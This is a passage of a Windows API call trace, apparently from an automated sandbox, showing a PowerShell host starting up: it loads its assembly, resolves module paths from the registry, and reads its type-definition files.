	[0313.450] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd0d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0313.451] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd180, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0313.451] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd0d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0313.451] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd0d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0313.451] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd180, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0313.451] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd0d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0313.451] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd0d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0313.454] CoTaskMemAlloc (cb=0x104) returned 0x3d2890
	[0313.454] GetEnvironmentVariableW (in: lpName="PSMODULEPATH", lpBuffer=0x3d2890, nSize=0x80 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x33
	[0313.454] CoTaskMemFree (pv=0x3d2890) 
	[0313.456] CoTaskMemAlloc (cb=0xcc) returned 0x1b41a410
	[0313.456] ExpandEnvironmentStringsW (in: lpSrc="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpDst=0x1b41a410, nSize=0x64 | out: lpDst="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x34
	[0313.456] CoTaskMemFree (pv=0x1b41a410) 
	[0313.456] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="System\\CurrentControlSet\\Control\\Session Manager\\Environment", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd8a8 | out: phkResult=0x1cd8a8*=0x324) returned 0x0
	[0313.456] RegQueryValueExW (in: hKey=0x324, lpValueName="PSMODULEPATH", lpReserved=0x0, lpType=0x1cd82c, lpData=0x0, lpcbData=0x1cd828*=0x0 | out: lpType=0x1cd82c*=0x2, lpData=0x0, lpcbData=0x1cd828*=0x6c) returned 0x0
	[0313.456] CoTaskMemAlloc (cb=0x70) returned 0x368810
	[0313.456] RegQueryValueExW (in: hKey=0x324, lpValueName="PSMODULEPATH", lpReserved=0x0, lpType=0x1cd7fc, lpData=0x368810, lpcbData=0x1cd7f8*=0x6c | out: lpType=0x1cd7fc*=0x2, lpData="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpcbData=0x1cd7f8*=0x6c) returned 0x0
	[0313.456] CoTaskMemFree (pv=0x368810) 
	[0313.456] CoTaskMemAlloc (cb=0xcc) returned 0x1b41a410
	[0313.456] ExpandEnvironmentStringsW (in: lpSrc="%SystemRoot%", lpDst=0x1b41a410, nSize=0x64 | out: lpDst="C:\\Windows") returned 0xb
	[0313.456] CoTaskMemFree (pv=0x1b41a410) 
	[0313.456] CoTaskMemAlloc (cb=0xcc) returned 0x1b41a410
	[0313.456] ExpandEnvironmentStringsW (in: lpSrc="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpDst=0x1b41a410, nSize=0x64 | out: lpDst="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x34
	[0313.456] CoTaskMemFree (pv=0x1b41a410) 
	[0313.460] RegCloseKey (hKey=0x324) returned 0x0
	[0313.460] CoTaskMemAlloc (cb=0xcc) returned 0x1b41a410
	[0313.460] ExpandEnvironmentStringsW (in: lpSrc="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpDst=0x1b41a410, nSize=0x64 | out: lpDst="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x34
	[0313.460] CoTaskMemFree (pv=0x1b41a410) 
	[0313.460] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Environment", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd8a8 | out: phkResult=0x1cd8a8*=0x324) returned 0x0
	[0313.461] RegQueryValueExW (in: hKey=0x324, lpValueName="PSMODULEPATH", lpReserved=0x0, lpType=0x1cd82c, lpData=0x0, lpcbData=0x1cd828*=0x0 | out: lpType=0x1cd82c*=0x0, lpData=0x0, lpcbData=0x1cd828*=0x0) returned 0x2
	[0313.461] RegCloseKey (hKey=0x324) returned 0x0
	[0313.467] CoTaskMemAlloc (cb=0x20c) returned 0x3bae50
	[0313.467] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x3bae50 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned 0x0
	[0313.468] CoTaskMemFree (pv=0x3bae50) 
	[0313.468] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", nBufferLength=0x105, lpBuffer=0x1cd430, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", lpFilePart=0x0) returned 0x27
	[0313.469] SetEnvironmentVariableW (lpName="PSMODULEPATH", lpValue="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Modules;C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 1
	[0313.480] CoTaskMemAlloc (cb=0x104) returned 0x3d2890
	[0313.480] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3d2890, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0313.480] CoTaskMemFree (pv=0x3d2890) 
	[0313.480] CoTaskMemAlloc (cb=0x104) returned 0x3d2890
	[0313.480] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3d2890, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0313.481] CoTaskMemFree (pv=0x3d2890) 
	[0313.483] CoTaskMemAlloc (cb=0x104) returned 0x3d2890
	[0313.483] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3d2890, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0313.483] CoTaskMemFree (pv=0x3d2890) 
	[0313.484] CoTaskMemAlloc (cb=0x104) returned 0x3d2890
	[0313.484] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3d2890, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0313.484] CoTaskMemFree (pv=0x3d2890) 
	[0314.267] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds\\Microsoft.PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd698 | out: phkResult=0x1cd698*=0x32c) returned 0x0
	[0314.268] RegQueryValueExW (in: hKey=0x32c, lpValueName="path", lpReserved=0x0, lpType=0x1cd6ac, lpData=0x0, lpcbData=0x1cd6a8*=0x0 | out: lpType=0x1cd6ac*=0x1, lpData=0x0, lpcbData=0x1cd6a8*=0x74) returned 0x0
	[0314.268] RegQueryValueExW (in: hKey=0x32c, lpValueName="path", lpReserved=0x0, lpType=0x1cd61c, lpData=0x0, lpcbData=0x1cd618*=0x0 | out: lpType=0x1cd61c*=0x1, lpData=0x0, lpcbData=0x1cd618*=0x74) returned 0x0
	[0314.268] CoTaskMemAlloc (cb=0x78) returned 0x368810
	[0314.268] RegQueryValueExW (in: hKey=0x32c, lpValueName="path", lpReserved=0x0, lpType=0x1cd5ec, lpData=0x368810, lpcbData=0x1cd5e8*=0x74 | out: lpType=0x1cd5ec*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", lpcbData=0x1cd5e8*=0x74) returned 0x0
	[0314.268] CoTaskMemFree (pv=0x368810) 
	[0314.268] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", nBufferLength=0x105, lpBuffer=0x1cd360, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpFilePart=0x0) returned 0x2a
	[0314.269] SetErrorMode (uMode=0x1) returned 0x1
	[0314.269] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0"), fInfoLevelId=0x0, lpFileInformation=0x1cd570 | out: lpFileInformation=0x1cd570*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80093051, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x1dba44b2, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1dba44b2, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1
	[0314.269] SetErrorMode (uMode=0x1) returned 0x1
	[0314.270] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x1cd360, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0314.270] SetErrorMode (uMode=0x1) returned 0x1
	[0314.270] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\getevent.types.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x1cd570 | out: lpFileInformation=0x1cd570*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67d6d2bb, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67d6d2bb, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe8e83beb, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x3cf3)) returned 1
	[0314.270] SetErrorMode (uMode=0x1) returned 0x1
	[0314.272] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x1cd360, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0314.273] SetErrorMode (uMode=0x1) returned 0x1
	[0314.273] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\types.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x1cd570 | out: lpFileInformation=0x1cd570*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe968c5bf, ftCreationTime.dwHighDateTime=0x1c9ea0b, ftLastAccessTime.dwLowDateTime=0xe968c5bf, ftLastAccessTime.dwHighDateTime=0x1c9ea0b, ftLastWriteTime.dwLowDateTime=0xe968c5bf, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x291b4)) returned 1
	[0314.273] SetErrorMode (uMode=0x1) returned 0x1
	[0314.273] CoTaskMemAlloc (cb=0x104) returned 0x3d2890
	[0314.273] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3d2890, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0314.273] CoTaskMemFree (pv=0x3d2890) 
	[0314.274] CoTaskMemAlloc (cb=0x104) returned 0x3d2890
	[0314.274] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3d2890, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0314.275] CoTaskMemFree (pv=0x3d2890) 
	[0314.275] GetACP () returned 0x4e4
	[0314.281] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x1ccf20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0314.281] SetErrorMode (uMode=0x1) returned 0x1
	[0314.282] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\getevent.types.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x330
	[0314.282] GetFileType (hFile=0x330) returned 0x1
	[0314.282] SetErrorMode (uMode=0x1) returned 0x1
	[0314.282] GetFileType (hFile=0x330) returned 0x1
	[0314.283] ReadFile (in: hFile=0x330, lpBuffer=0x2db0818, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd4a8, lpOverlapped=0x0 | out: lpBuffer=0x2db0818*, lpNumberOfBytesRead=0x1cd4a8*=0x1000, lpOverlapped=0x0) returned 1
	[0314.285] ReadFile (in: hFile=0x330, lpBuffer=0x2db0818, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd4a8, lpOverlapped=0x0 | out: lpBuffer=0x2db0818*, lpNumberOfBytesRead=0x1cd4a8*=0x1000, lpOverlapped=0x0) returned 1
	[0314.286] ReadFile (in: hFile=0x330, lpBuffer=0x2db0818, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd4a8, lpOverlapped=0x0 | out: lpBuffer=0x2db0818*, lpNumberOfBytesRead=0x1cd4a8*=0x1000, lpOverlapped=0x0) returned 1
	[0314.286] ReadFile (in: hFile=0x330, lpBuffer=0x2db0818, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd4a8, lpOverlapped=0x0 | out: lpBuffer=0x2db0818*, lpNumberOfBytesRead=0x1cd4a8*=0xcf3, lpOverlapped=0x0) returned 1
	[0314.286] ReadFile (in: hFile=0x330, lpBuffer=0x2dafc73, nNumberOfBytesToRead=0x30d, lpNumberOfBytesRead=0x1cd4a8, lpOverlapped=0x0 | out: lpBuffer=0x2dafc73*, lpNumberOfBytesRead=0x1cd4a8*=0x0, lpOverlapped=0x0) returned 1
	[0314.287] ReadFile (in: hFile=0x330, lpBuffer=0x2db0818, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd4a8, lpOverlapped=0x0 | out: lpBuffer=0x2db0818*, lpNumberOfBytesRead=0x1cd4a8*=0x0, lpOverlapped=0x0) returned 1
	[0314.289] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x1cd1c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0314.289] SetErrorMode (uMode=0x1) returned 0x1
	[0314.289] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\getevent.types.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x1cd420 | out: lpFileInformation=0x1cd420*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67d6d2bb, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67d6d2bb, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe8e83beb, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x3cf3)) returned 1
	[0314.289] SetErrorMode (uMode=0x1) returned 0x1
	[0314.290] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x1cd150, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0314.290] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd508 | out: phkResult=0x1cd508*=0x330) returned 0x0
	[0314.291] RegQueryValueExW (in: hKey=0x330, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1cd48c, lpData=0x0, lpcbData=0x1cd488*=0x0 | out: lpType=0x1cd48c*=0x1, lpData=0x0, lpcbData=0x1cd488*=0x56) returned 0x0
	[0314.291] CoTaskMemAlloc (cb=0x5a) returned 0x3d7880
	[0314.291] RegQueryValueExW (in: hKey=0x330, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1cd45c, lpData=0x3d7880, lpcbData=0x1cd458*=0x56 | out: lpType=0x1cd45c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x1cd458*=0x56) returned 0x0
	[0314.291] CoTaskMemFree (pv=0x3d7880) 
	[0314.291] RegCloseKey (hKey=0x330) returned 0x0
	[0314.291] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x1cd150, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0314.291] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x1cd000, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0315.093] GetSystemInfo (in: lpSystemInfo=0x1cc140 | out: lpSystemInfo=0x1cc140*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7fffffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) 
	[0315.093] VirtualQuery (in: lpAddress=0x1cc1f0, lpBuffer=0x1cd0b0, dwLength=0x30 | out: lpBuffer=0x1cd0b0*(BaseAddress=0x1cc000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0317.238] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x1ccf20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0317.238] SetErrorMode (uMode=0x1) returned 0x1
	[0317.238] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\types.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x330
	[0317.238] GetFileType (hFile=0x330) returned 0x1
	[0317.238] SetErrorMode (uMode=0x1) returned 0x1
	[0317.238] GetFileType (hFile=0x330) returned 0x1
	[0317.238] ReadFile (in: hFile=0x330, lpBuffer=0x2cb3810, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd4a8, lpOverlapped=0x0 | out: lpBuffer=0x2cb3810*, lpNumberOfBytesRead=0x1cd4a8*=0x1000, lpOverlapped=0x0) returned 1
	[0317.239] ReadFile (in: hFile=0x330, lpBuffer=0x2cb3810, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd4a8, lpOverlapped=0x0 | out: lpBuffer=0x2cb3810*, lpNumberOfBytesRead=0x1cd4a8*=0x1000, lpOverlapped=0x0) returned 1
	[0317.239] ReadFile (in: hFile=0x330, lpBuffer=0x2cb3810, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd4a8, lpOverlapped=0x0 | out: lpBuffer=0x2cb3810*, lpNumberOfBytesRead=0x1cd4a8*=0x1000, lpOverlapped=0x0) returned 1
	[0317.240] ReadFile (in: hFile=0x330, lpBuffer=0x2cb3810, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd4a8, lpOverlapped=0x0 | out: lpBuffer=0x2cb3810*, lpNumberOfBytesRead=0x1cd4a8*=0x1000, lpOverlapped=0x0) returned 1
	[0317.240] ReadFile (in: hFile=0x330, lpBuffer=0x2cb3810, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd4a8, lpOverlapped=0x0 | out: lpBuffer=0x2cb3810*, lpNumberOfBytesRead=0x1cd4a8*=0x1000, lpOverlapped=0x0) returned 1
	[0317.240] ReadFile (in: hFile=0x330, lpBuffer=0x2cb3810, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd4a8, lpOverlapped=0x0 | out: lpBuffer=0x2cb3810*, lpNumberOfBytesRead=0x1cd4a8*=0x1000, lpOverlapped=0x0) returned 1
	[0317.240] ReadFile (in: hFile=0x330, lpBuffer=0x2cb3810, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd4a8, lpOverlapped=0x0 | out: lpBuffer=0x2cb3810*, lpNumberOfBytesRead=0x1cd4a8*=0x1000, lpOverlapped=0x0) returned 1
	[0317.240] ReadFile (in: hFile=0x330, lpBuffer=0x2cb3810, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd4a8, lpOverlapped=0x0 | out: lpBuffer=0x2cb3810*, lpNumberOfBytesRead=0x1cd4a8*=0x1000, lpOverlapped=0x0) returned 1
	[0317.241] ReadFile (in: hFile=0x330, lpBuffer=0x2cb3810, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd4a8, lpOverlapped=0x0 | out: lpBuffer=0x2cb3810*, lpNumberOfBytesRead=0x1cd4a8*=0x1000, lpOverlapped=0x0) returned 1
	[0317.242] ReadFile (in: hFile=0x330, lpBuffer=0x2cb3810, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd4a8, lpOverlapped=0x0 | out: lpBuffer=0x2cb3810*, lpNumberOfBytesRead=0x1cd4a8*=0x1000, lpOverlapped=0x0) returned 1
	[0317.242] ReadFile (in: hFile=0x330, lpBuffer=0x2cb3810, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd4a8, lpOverlapped=0x0 | out: lpBuffer=0x2cb3810*, lpNumberOfBytesRead=0x1cd4a8*=0x1000, lpOverlapped=0x0) returned 1
	[0317.242] ReadFile (in: hFile=0x330, lpBuffer=0x2cb3810, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd4a8, lpOverlapped=0x0 | out: lpBuffer=0x2cb3810*, lpNumberOfBytesRead=0x1cd4a8*=0x1000, lpOverlapped=0x0) returned 1
	[0317.242] ReadFile (in: hFile=0x330, lpBuffer=0x2cb3810, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd4a8, lpOverlapped=0x0 | out: lpBuffer=0x2cb3810*, lpNumberOfBytesRead=0x1cd4a8*=0x1000, lpOverlapped=0x0) returned 1
	[0317.243] ReadFile (in: hFile=0x330, lpBuffer=0x2cb3810, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd4a8, lpOverlapped=0x0 | out: lpBuffer=0x2cb3810*, lpNumberOfBytesRead=0x1cd4a8*=0x1000, lpOverlapped=0x0) returned 1
	[0317.243] ReadFile (in: hFile=0x330, lpBuffer=0x2cb3810, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd4a8, lpOverlapped=0x0 | out: lpBuffer=0x2cb3810*, lpNumberOfBytesRead=0x1cd4a8*=0x1000, lpOverlapped=0x0) returned 1
	[0317.243] ReadFile (in: hFile=0x330, lpBuffer=0x2cb3810, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd4a8, lpOverlapped=0x0 | out: lpBuffer=0x2cb3810*, lpNumberOfBytesRead=0x1cd4a8*=0x1000, lpOverlapped=0x0) returned 1
	[0317.243] ReadFile (in: hFile=0x330, lpBuffer=0x2cb3810, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd4a8, lpOverlapped=0x0 | out: lpBuffer=0x2cb3810*, lpNumberOfBytesRead=0x1cd4a8*=0x1000, lpOverlapped=0x0) returned 1
	[0317.245] ReadFile (in: hFile=0x330, lpBuffer=0x2cb3810, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd4a8, lpOverlapped=0x0 | out: lpBuffer=0x2cb3810*, lpNumberOfBytesRead=0x1cd4a8*=0x1000, lpOverlapped=0x0) returned 1
	[0317.245] ReadFile (in: hFile=0x330, lpBuffer=0x2cb3810, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd4a8, lpOverlapped=0x0 | out: lpBuffer=0x2cb3810*, lpNumberOfBytesRead=0x1cd4a8*=0x1000, lpOverlapped=0x0) returned 1
	[0317.245] ReadFile (in: hFile=0x330, lpBuffer=0x2cb3810, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd4a8, lpOverlapped=0x0 | out: lpBuffer=0x2cb3810*, lpNumberOfBytesRead=0x1cd4a8*=0x1000, lpOverlapped=0x0) returned 1
	[0317.246] ReadFile (in: hFile=0x330, lpBuffer=0x2cb3810, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd4a8, lpOverlapped=0x0 | out: lpBuffer=0x2cb3810*, lpNumberOfBytesRead=0x1cd4a8*=0x1000, lpOverlapped=0x0) returned 1
	[0317.246] ReadFile (in: hFile=0x330, lpBuffer=0x2cb3810, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd4a8, lpOverlapped=0x0 | out: lpBuffer=0x2cb3810*, lpNumberOfBytesRead=0x1cd4a8*=0x1000, lpOverlapped=0x0) returned 1
	[0317.246] ReadFile (in: hFile=0x330, lpBuffer=0x2cb3810, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd4a8, lpOverlapped=0x0 | out: lpBuffer=0x2cb3810*, lpNumberOfBytesRead=0x1cd4a8*=0x1000, lpOverlapped=0x0) returned 1
	[0317.246] ReadFile (in: hFile=0x330, lpBuffer=0x2cb3810, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd4a8, lpOverlapped=0x0 | out: lpBuffer=0x2cb3810*, lpNumberOfBytesRead=0x1cd4a8*=0x1000, lpOverlapped=0x0) returned 1
	[0317.247] ReadFile (in: hFile=0x330, lpBuffer=0x2cb3810, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd4a8, lpOverlapped=0x0 | out: lpBuffer=0x2cb3810*, lpNumberOfBytesRead=0x1cd4a8*=0x1000, lpOverlapped=0x0) returned 1
